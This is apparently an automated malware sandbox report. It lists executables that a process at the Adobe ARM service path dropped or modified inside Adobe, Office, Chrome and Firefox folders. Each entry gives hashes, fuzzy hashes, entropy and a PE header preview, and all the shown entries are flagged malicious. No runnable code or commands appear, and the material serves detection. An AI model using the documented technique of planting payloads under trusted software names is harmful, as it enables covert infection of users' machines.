                                                                                                                                                  C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3163136
                                                                                                                                                  Entropy (8bit):7.971279241050893
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:98304:WrZ23AbsK6Ro022JjL2WEiVqJZd7wRGpj3:QJADmmxL2WEoCZhF9
                                                                                                                                                  MD5:F6E0896ED4DD35B6BC8B89758B886C72
                                                                                                                                                  SHA1:1963934D71A77B96EE0A494942C70D9226A4A30B
                                                                                                                                                  SHA-256:A1CEAA18C2DD17EE7BFF8185421F3B53176C2D0AC014553DE26EE1F5BF33CC05
                                                                                                                                                  SHA-512:AFB7A1DB6C08E4B78F2CA4AC1B7629DB8B63D238E86B7CF1D7EF72F0BF787365271E403BD6965BCBE6F3FF7E3B0A0A3F46013A4B3C2C995EFF5C4CC83D038A9B
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5{.!q..rq..rq..rq..r...rQc.r`..rQc.r`..rQc.rp..rQc.rp..rRichq..r........................PE..L.....A.................~... .......^... ........... ........................1.....r.1.......... .....................................0............................!............................................... ...............................text....|... ...~.................. ..`.data...............................@....rsrc...../......./.................@...................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1213440
                                                                                                                                                  Entropy (8bit):7.194657091391323
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:afrYY42wd7hlOE9fpkEE64U/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:j/9xrSULNiXicJFFRGNzj3
                                                                                                                                                  MD5:DFC7546A653B834771FD19B0D832414F
                                                                                                                                                  SHA1:F7AD1C01DAEAEE6F0839B8F5C7678BACE6EF8B7E
                                                                                                                                                  SHA-256:FB001A2126D995C44B52794B2E7CBB56297022CB162124BDCFD97909CDBCD6DF
                                                                                                                                                  SHA-512:7705419FEB98613CA0663DA19A4C96269F9D7DBEF95A18C3AE5F662B31C4AA14C3CAD17A440E5400DE065D5956A667D3216EF2BCD75DB7C444514CE956438747
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......T...T...T...U...T...U...T..U...T..U...T...U...T..U...T...U...T...Tf..T..U...T..T...T..uT...T..U...TRich...T................PE..d.....{d..........#......J...........3.........@............................. .......C.... ..................................................L.......`..........(J..................p...T.......................(... B..8............`.......I..`....................text....H.......J.................. ..`.rdata..d....`.......N..............@..@.data...(w...p...&...^..............@....pdata..(J.......L..................@..@.didat.......@......................@..._RDATA.......P......................@..@.rsrc........`......................@...................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1544192
                                                                                                                                                  Entropy (8bit):4.836102321508394
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:7zNKU/5T/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:7zNr/5TLNiXicJFFRGNzj3
                                                                                                                                                  MD5:A74E527E4DEC3BA66B39963F979E471E
                                                                                                                                                  SHA1:CE386DDDF7E2795A61C73438AA4282A18F7CE5A5
                                                                                                                                                  SHA-256:B9B8958619DC878DF6427D2CC8F6F245F0A622A14525DF3705CB28F8725D2C2F
                                                                                                                                                  SHA-512:734B8F7F065EF2DEF3FBF0B07218286529B3B0C406CD62A9CA1E58331DED51393B9A3432DE3962E5A92835C777E0A44579E9A48B15FEF3F741E8CAE5BEBC43A1
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........E@..$...$...$...\...$...V*..$...V-..$...V+..$...V/..$...$/.0 ...V&..$...V..$...V..$...V,..$..Rich.$..........PE..d...!!.R.........."......`..........0C.........@.............................`".....4..... .......... ......................................Xl..........X.......d.......................T...................8...(.......8...........`...`............................text...(X.......`.................. ..`.rdata..z....p... ...p..............@..@.data...............................@....pdata..d........ ..................@..@.rsrc...X...........................@..@.reloc..............................@...................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):5855744
                                                                                                                                                  Entropy (8bit):6.572133770210121
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:98304:VALuzDKnxCp3JKCrPJzruaI6HMaJTtGb+7wRGpj3:2aGg3cuPIaI6HMaJTtGbyF9
                                                                                                                                                  MD5:7E460A630E95DA1229351CB29360B0CD
                                                                                                                                                  SHA1:ACFA94C9735CE496802F15DEBFBBAEC28DC1FF17
                                                                                                                                                  SHA-256:46B226F90083FA69FE5BD771AC7D2689E4C4E90671756C8C27F707A282BE2002
                                                                                                                                                  SHA-512:951F86877783D6DEFCEE522E7D1E909A26E915A199F71D64D7CB9D6F1057E03B58F131E31F09F1CF6264CB50825F2FEC805CED7159CEC2F33BBBAC19AE4FA447
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......Jc.M.............p......nx......nx......).......)........p.......p.......p..&....p..............nx..i...kx......kx......kx..g...kxx.............kx......Rich....................PE..d....".e..........".... .z6..........32........@..............................Y......7Z... .................................................8.B.......K..a...PI..%..................0.B.8...................X.B.(.....7.@.............6.0.....B......................text....y6......z6................. ..`.rdata..5.....6......~6.............@..@.data...`....0G.......G.............@....pdata...%...PI..&...:I.............@..@.didat.. .....K......`K.............@..._RDATA..\.....K......fK.............@..@.rsrc....a....K..b...hK.............@..@.reloc........P.......O.............@...................................................................................................................

                                                                                                                                                  C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1468416
                                                                                                                                                  Entropy (8bit):4.890076282617634
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:vXr/SVAxWQ/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:TNxdLNiXicJFFRGNzj3
                                                                                                                                                  MD5:2F598AC78D8B5787C96B95B60EC550F1
                                                                                                                                                  SHA1:EC0084C772CB662AA094B008E64A43156A311E0A
                                                                                                                                                  SHA-256:48BD23B16557CB75C304A12F2F8D322515BFC30E27B807575585271D77A7CA1B
                                                                                                                                                  SHA-512:44ED3379158C16F7A02D785EEBFA6A07636D99D21FE4525F17686786ABC224BB98A5897A94935CB82155B0041B2C184FD806E80A229039D293E9BD4854C4D79B
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K.k...k...k.......k.......k.......k.......k...k..Ro.......k....l..k.......k....n..k.......k..Rich.k..........PE..L...9.A/.....................T......@V............@..........................`!......x........... ......................................8............................_..T...............................@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...8...........................@..@.reloc..............................@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):27533312
                                                                                                                                                  Entropy (8bit):6.248047435541867
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:196608:fhRrmpGpGdJM7Hbp8JfrCGvqTYuNDmoefAlprtPz25HqaI6HMaJTtGbQO2F9:fhRCpGpMJMrbp8JjpWdNlc5V9
                                                                                                                                                  MD5:7B07045010876FA80CD2987CF34C7E9D
                                                                                                                                                  SHA1:724D3F10A208999F7472B819B47EE08CD47BE409
                                                                                                                                                  SHA-256:7128C4D5B366FEA275742D7411E8740E0938948DD6723AD4075C2BECBA23640B
                                                                                                                                                  SHA-512:2BC81908CF17901D622604A5FE548FB17EC29EFF4D5D6BFC4AC78EEC3F6F7ACD8B6D3E8B33D35EFBD1012C826F3A908D155DAA73CCBD38A853F2B75E5E643B06
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......$.|+`{.x`{.x`{.xi..xv{.x...yf{.x...yj{.x...yd{.x...yO{.xG..xh{.xG.oxa{.x...yb{.x...ya{.x...ya{.x...yd{.x...yc{.x...y~{.x...y}{.x`{.xTs.x...ya{.x...yjz.x...y v.x...xa{.x`{.xa{.x...ya{.xRich`{.x........PE..d......e..........".... .....H.................@....................................Q.... ..................................................u..D.... ?...X...7.........................8....................U..(...`...@............0.. "..l .......................text............................... ..`.rdata..S.~..0....~.................@..@.data.........1.......0.............@....pdata........7.......7.............@..@.didat..`.....>.......>.............@....detourc.!....>.."....>.............@..@.rsrc.....X.. ?...X...>.............@..@.reloc..............................@...........................................................................................

                                                                                                                                                  C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2199552
                                                                                                                                                  Entropy (8bit):6.782230933232861
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:F83pZ3kd0CuEeN0LUmRXbYs65mKLNiXicJFFRGNzj3:1KuUMY15B7wRGpj3
                                                                                                                                                  MD5:4AE8ADF9E12D9FFF0F288FB1B5B90662
                                                                                                                                                  SHA1:89A952CC40C6B88AD81403A5D21B27F088DB6387
                                                                                                                                                  SHA-256:3E867D570A0FF01865239F3FF9D51BCBE9AB24554F7B43F24C7193830FFF697F
                                                                                                                                                  SHA-512:7A120F98585FAC7A05C78C4B39387E034A3601E2EC7FAAAB15F6F7775C6EC845B3149F308722742F6C05DC6AB7864588008DE994E04DE99DD32DDAD8EA2F7D69
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D................7......................!..............~............Y.......[............Rich............PE..d...rq............"..................$.........@..............................!.....w-"... .......... ......................................P...|....p... ......L....................a..T...................Xt..(... s..8............t...............................text...6........................... ..`.rdata..............................@..@.data...@...........................@....pdata..L...........................@..@.rsrc.... ...p...0...P..............@..@.reloc... ..........................@...................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4971008
                                                                                                                                                  Entropy (8bit):6.668194663584365
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:mErw1zDb1mZtOoGpDYdSTtWXy4eqH8nYAmoBvYQugWupoI6bAGO8ndOPcptz6+MM:4A4oGlcR+glpdOPKzgVZw7wRGpj3
                                                                                                                                                  MD5:7AC201DD547394BFDE9BA920599AC085
                                                                                                                                                  SHA1:5C94E6895B98D3B8E15AF11B996CB92BDB123DF4
                                                                                                                                                  SHA-256:D115CF87F59A1D228A99A7CF44A6C714F5C3A2952137B7118C3224F5616DAAB4
                                                                                                                                                  SHA-512:AF167B2E340A414BCCC0F46846D37C38252B656CFCAC4EE17F0097E6D8F53B924B1881E61B613E77FCBBA41838D6D8A140A4936A59FAD39C72F63367CCCED99C
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Eh.<..{o..{o..{o.q.o..{oaszn..{oas~n*.{oas.n..{oasxn..{o.{}n..{o.{xn..{o.{.n..{o.{zn..{o..zo..{odsxn..{ods~n..{odsrnF.{ods.o..{o...o..{odsyn..{oRich..{o........PE..d...0m.d..........".... ..-.........0p+........@..............................L.....I.K... .................................................HZ:.......B.......@.<C....................:.8...................p.9.(... P..@.............-......H:.@....................text...[.-.......-................. ..`.rdata..9.....-.......-.............@..@.data...x....`>......>>.............@....pdata..<C....@..D....@.............@..@.didat..`.....B......LB.............@....rsrc.........B......PB.............@..@.reloc........B......ZB.............@...........................................................................................................................................................................

                                                                                                                                                  C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4897792
                                                                                                                                                  Entropy (8bit):6.827351215372555
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:68ErDqTGsitHloGgkiDrCvJVZfEcpwD0YLgVCM2hnwLNwiHaGI3Y/685ZYMaWgKe:Xv2gM+qwtLg7pPgw/DSZ9L7wRGpj3
                                                                                                                                                  MD5:7FE65DD2F6BABBA5873955EC61780924
                                                                                                                                                  SHA1:1E1FD2D765BEADD1CFC13E42204E30EEB719623C
                                                                                                                                                  SHA-256:F1279C3D036DA730F4641D46DAB517F0E0669AFC7E56858CC40DB379AF5A41E1
                                                                                                                                                  SHA-512:61C46FE4A99A4E44F6E5BE49F23E0D0345E1C3477BCFACAE06AC7EDFD553B8B45ADEA575DE870B8A3C830EEF3A0F3BBD8B2668A9D095F88E924B9D31F4E848AF
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L.......K... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

                                                                                                                                                  C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4897792
                                                                                                                                                  Entropy (8bit):6.827351180530735
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:p8ErDqTGsitHloGgkiDrCvJVZfEcpwD0YLgVCM2hnwLNwiHaGI3Y/685ZYMaWgKe:ev2gM+qwtLg7pPgw/DSZ9L7wRGpj3
                                                                                                                                                  MD5:9A0D9414E1332F5FEB32FC0B12168B42
                                                                                                                                                  SHA1:0020FC195E1BA77C8244FCE84747BAC637D6F856
                                                                                                                                                  SHA-256:E626D01758BAFC4EDD169399A2152FC1AACE6D6186A22D7CDB0486B0C772A211
                                                                                                                                                  SHA-512:D90A254A1C58A73F96E7AAAF08CACDFECE3376C6E532F40C2BDF3CB99E89DB36099C6D856621CA13BF896E1EB79573652376DBC17C1457FFAD1E105D189AC6B3
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L.......K... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

                                                                                                                                                  C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2156544
                                                                                                                                                  Entropy (8bit):6.947515475098851
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:LtjqL8fHv8aUbp8D/8+xQWAV/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:xjKKv81FI/85rLNiXicJFFRGNzj3
                                                                                                                                                  MD5:3EDA60883FBF69D95EACD7A0CEA03B6A
                                                                                                                                                  SHA1:A7A045B8234C0CEF8D92147CF2C783352C03C2F6
                                                                                                                                                  SHA-256:9CEB04A1E95728B6274085FF2E7F3DDF99A0A3B461600D01F5C7E37BDB95EEA7
                                                                                                                                                  SHA-512:8EA8059E587259A6014EB4D2B88BC595DF9DF3676CA0AFBE68F5B04D0743988D1C19BA31328D373251F757C47BC531EFB546E5DB62BCA00F235FC1D3E0F6B6C7
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......F.....................@.............................P".....Xi!... ..........................................X..\...$Y....... ...&......(...................lM......................PL..(...pr..@............_...............................text....D.......F.................. ..`.rdata..$....`.......J..............@..@.data...,.... ......................@....pdata..(...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@...LZMADEC............................. ..`_RDATA..\...........................@..@malloc_h............................ ..`.rsrc....&... ...(..................@..@.reloc.......P......................@...................................................................................................

                                                                                                                                                  C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2370560
                                                                                                                                                  Entropy (8bit):7.027357521577748
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:FAMsOu3JfCIGcZuTodRFYKBrFxbWplLNiXicJFFRGNzj3:FAMa3PZuTSe7wRGpj3
                                                                                                                                                  MD5:68179C7A7DE0B1ED4B910C5C60143191
                                                                                                                                                  SHA1:ADD0D8C57FB2D0EFD2A5B74607D2E25CE0FEB01A
                                                                                                                                                  SHA-256:86A448595195FA3F0B9EC2A0FDB32C14080DE5967F7A787EE6E1693521B0919E
                                                                                                                                                  SHA-512:F44A504C55AE6A4DFC900967C30FCD8D86A209C0FA0A39A1A256F3DDCE6AAE40912F322EB7A12065FF59D4043AD954E311B31770FCC7913447C77ECA744EC3A0
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e..........".................0..........@..............................%......|$... ..........................................}..Z...Z}...............@..`...................$k.......................j..(.......@............... ............................text...V........................... ..`.rdata..Hv.......x..................@..@.data...t....`.......>..............@....pdata..`....@.......6..............@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.....@...........................tls....A....P......................@..._RDATA..\....`....... ..............@..@malloc_h.....p.......".............. ..`.rsrc................$..............@..@.reloc...............<..............@...........................................................................................................................................

                                                                                                                                                  C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1984512
                                                                                                                                                  Entropy (8bit):7.098289029587309
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:OSK7Fhsly2EPfOfEQLNiXicJFFRGNzj3:DU2cBQ7wRGpj3
                                                                                                                                                  MD5:FD78FBB2F561639B1ED86E5A8E587A52
                                                                                                                                                  SHA1:F85940EC9506C8743C5459261C087A909F6DC1F2
                                                                                                                                                  SHA-256:03F76724A56A6292DF43A0C38B7056D85B0C71B5E59C72943FB730FFFF6CB2EF
                                                                                                                                                  SHA-512:A4650939DC67804A859DE4F801EBB96D9BBE428682E86379D6CCC3341A878AF08755BB32EC91C21648A1D9F9F58CF9D9D8A851559F87ACA2FE0F3ABDC4F983BB
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."............................@....................................Q<.... ............................................\...$................p..t...............................................(...P...@...........x...x............................text............................... ..`.rdata..............................@..@.data................z..............@....pdata..t....p.......x..............@..@.00cfg..0...........................@..@.gxfg...@-... ......................@..@.retplne.....P.......D...................tls.........`.......F..............@...CPADinfo8....p.......H..............@..._RDATA..\............J..............@..@malloc_h.............L.............. ..`.rsrc................N..............@..@.reloc...............X..............@...................................................................................................

                                                                                                                                                  C:\Program Files\Google\Chrome\Application\chrome_proxy.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1779712
                                                                                                                                                  Entropy (8bit):7.151364902018391
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:Uv7e0j11mD+/wDfb+LNiXicJFFRGNzj3:ODx1mz+7wRGpj3
                                                                                                                                                  MD5:F920B8DA31BA119EDD7CD8AFA3B9186B
                                                                                                                                                  SHA1:E41C284D29EF321036D5234D467FAD1A0899EF4B
                                                                                                                                                  SHA-256:10E5C1DF77F6F619A096F1D72107F4FC653CF4DEB5736088DBE707A7EDA41587
                                                                                                                                                  SHA-512:AC43DF90FE4045EB318F87EA1DE7AC0DD1577022B40D04A33629CC24F338FB0DA288709E7DF1D150135140DCF8D35CFAB70C6C5C9EEF94E99AEF79DBB187C0F3
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."..........B.................@.......................................... .........................................X...U...............x....p.................................................(...`2..@...............X............................text............................... ..`.rdata..,w... ...x..................@..@.data...............................@....pdata......p.......x..............@..@.00cfg..0...........................@..@.gxfg....).......*..................@..@.retplne.....@.......&...................tls.........P.......(..............@..._RDATA..\....`.......*..............@..@malloc_h.....p.......,.............. ..`.rsrc...x...........................@..@.reloc...............8..............@...........................................................................................................................................

                                                                                                                                                  C:\Program Files\Mozilla Firefox\crashreporter.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1533952
                                                                                                                                                  Entropy (8bit):4.933091317008658
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:sKhSK/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:sQLNiXicJFFRGNzj3
                                                                                                                                                  MD5:46A88030650B69A1D77D639BE797C089
                                                                                                                                                  SHA1:AC9E2A29735AD0976BF924E802E8DC9C85564546
                                                                                                                                                  SHA-256:23C6EF2B3257F139C5D54C116224CC19712A2514B770D1E8C2F8BB417FD6ED75
                                                                                                                                                  SHA-512:C86640AAD2809ADF7121E67E7E8B2285C2CB1E94878A19BF25984EEE02E09E7D8FB1C21025FA9B927A323BED5E08C08BE6F5A2937EFCDE56160C99971A86AD9E
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."............................@.............................."........... ..................................................................P......................T...........................(...p...8...........H................................text............................... ..`.rdata...h.......j..................@..@.data........@......................@....pdata.......P.......0..............@..@.00cfg..(....`.......@..............@..@.tls.........p.......B..............@....voltbl..............D...................rsrc................F..............@..@.reloc...`... ......................@...................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files\Mozilla Firefox\default-browser-agent.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1286656
                                                                                                                                                  Entropy (8bit):7.213926379706895
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:EsFfc1VyFnTUQn652bO4Hl/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:EsFcInTrJ7LNiXicJFFRGNzj3
                                                                                                                                                  MD5:5ECF9FFAC9C1BEF34D4D30E58F65417B
                                                                                                                                                  SHA1:C6446F12C1BFF4DBC7E9C94219E9CB6B62D202CF
                                                                                                                                                  SHA-256:AA0F63BF4D1E019952B058F7EA4995413B882C6B4559352A66FD121DA9248352
                                                                                                                                                  SHA-512:BAC8FC6394A1CC1168FDE52011A9470AAA646B6D421CF7FFE20923759776BC3525A9C5A6D8A7FDA584EDB80597FCDD77E0C1D29CC22BCB8BB9B16E8CA46B00F1
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......6..........pX.........@......................................... ..........................................J.......K..........`........%..................DA..........................(...`...8............V...............................text...V5.......6.................. ..`.rdata...O...P...P...:..............@..@.data...............................@....pdata...%.......&..................@..@.00cfg..(...........................@..@.tls................................@....voltbl..................................rsrc...`...........................@..@.reloc....... ......................@...................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files\Mozilla Firefox\firefox.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1246208
                                                                                                                                                  Entropy (8bit):7.48557704963998
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:nt9j6p4xQbiKI69wpemIwpel9u/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:nt9+aQbtl2peapel8LNiXicJFFRGNzj3
                                                                                                                                                  MD5:550EA7B872B92DB4344DE6F7F5BD465D
                                                                                                                                                  SHA1:4856B577FA322AE14D4C42CEC92A87EC16BAD0A2
                                                                                                                                                  SHA-256:B071F12A9EB3502AA1B5CBC11235B9A725CAAA62852D270507F8633120A6E91C
                                                                                                                                                  SHA-512:1DDCEE4097858BAABF0EA8325077EEA358E0D807158CED92A9660545A7EED89C93FD55DF22171FB928A453649A4A5DDDBC12F60EF586A185CED7263A31B394F7
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
